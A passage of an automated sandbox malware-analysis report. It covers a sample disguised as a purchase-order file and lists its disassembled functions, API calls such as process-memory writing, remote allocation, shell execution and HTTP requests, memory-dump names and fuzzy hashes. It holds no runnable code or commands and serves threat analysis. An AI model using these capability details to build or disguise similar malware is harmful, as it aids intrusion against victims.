                                  • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                                  Function 0044F405 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 302COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: )$U$\
                                  • API String ID: 0-3705770531
                                  • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                  • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                                  • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                  • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                                  Function 0046E48D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 263comCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                  • CoInitialize.OLE32(00000000), ref: 0046E505
                                  • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                  • CoUninitialize.OLE32 ref: 0046E53D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: CreateInitializeInstanceUninitialize_wcslen
                                  • String ID: .lnk
                                  • API String ID: 886957087-24824748
                                  • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                  • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                                  • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                  • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                                  Function 0044E180 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _memmove
                                  • String ID: \
                                  • API String ID: 4104443479-2967466578
                                  • Opcode ID: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                  • Instruction ID: 90b25fc4546a2c21e21e7939c456fa175a28996bec6c3309f7edcf8d77039fcb
                                  • Opcode Fuzzy Hash: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                  • Instruction Fuzzy Hash: 8AB1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                  Function 0044E189 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _memmove
                                  • String ID: \
                                  • API String ID: 4104443479-2967466578
                                  • Opcode ID: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                  • Instruction ID: 47d8400a167da4587eb122393216330e55bf30386b581c043e0675457d4a745f
                                  • Opcode Fuzzy Hash: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                  • Instruction Fuzzy Hash: F1B1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                  Function 0044E199 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 260COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _memmove
                                  • String ID: \
                                  • API String ID: 4104443479-2967466578
                                  • Opcode ID: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                  • Instruction ID: 4d1558bed40bbae7f26d93592334ac0d2c658ca85fbb7fec499742c135aa7d63
                                  • Opcode Fuzzy Hash: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                  • Instruction Fuzzy Hash: E5A1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED441AB381D7795946CB1A
                                  Function 0046A6E1 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 241COMMON
                                  Download Yara Rule
                                  Strings
                                  • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                                  • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                  • API String ID: 708495834-557222456
                                  • Opcode ID: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                  • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                                  • Opcode Fuzzy Hash: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                  • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                                  Function 0047839D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 228comCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                  • CoInitialize.OLE32(00000000), ref: 00478442
                                  • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                                  • CoUninitialize.OLE32 ref: 0047863C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: CreateInitializeInstanceUninitialize_wcslen
                                  • String ID: .lnk
                                  • API String ID: 886957087-24824748
                                  • Opcode ID: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                  • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                                  • Opcode Fuzzy Hash: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                  • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                                  Function 0043659E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 162windowCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                  • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                    • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                    • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                    • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                    • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                  • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                  • String ID: @
                                  • API String ID: 4150878124-2766056989
                                  • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                  • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                                  • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                  • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                                  Function 0044F137 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 161COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _memmove
                                  • String ID: \$]$h
                                  • API String ID: 4104443479-3262404753
                                  • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                  • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                                  • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                  • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                                  Function 00457C53 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 158COMMON
                                  Download Yara Rule
                                  APIs
                                  • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                    • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                    • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                  • CloseHandle.KERNEL32(?), ref: 00457E09
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                                  • String ID: <$@
                                  • API String ID: 2417854910-1426351568
                                  • Opcode ID: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                                  • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                                  • Opcode Fuzzy Hash: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                                  • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                                  Function 0044A856 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                    • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                  • String ID:
                                  • API String ID: 3705125965-3916222277
                                  • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                  • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                                  • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                  • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                                  Function 0045FA41 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                  • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                  • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Menu$Delete$InfoItem
                                  • String ID: 0
                                  • API String ID: 135850232-4108050209
                                  • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                  • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                                  • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                  • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                                  Function 004507B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                                  • 742845F0.USER32(?,000000F0), ref: 0045087D
                                  • 742859E0.USER32(?,000000F0,00000000,?,000000F0), ref: 0045088E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: 742845742859Window
                                  • String ID: SysTreeView32
                                  • API String ID: 2921398790-1698111956
                                  • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                  • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                                  • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                  • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                                  Function 00434B02 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 108libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNEL32(?), ref: 00434B10
                                  • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                                  • FreeLibrary.KERNEL32(?), ref: 00434B9F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Library$AddressFreeLoadProc
                                  • String ID: AU3_GetPluginDetails
                                  • API String ID: 145871493-4132174516
                                  • Opcode ID: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                                  • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                                  • Opcode Fuzzy Hash: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                                  • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                                  Function 004509D8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97COMMON
                                  Download Yara Rule
                                  APIs
                                  • 74285CF0.USER32(00000000), ref: 00450A2F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: 74285
                                  • String ID: msctls_updown32
                                  • API String ID: 3433674075-2298589950
                                  • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                  • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                                  • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
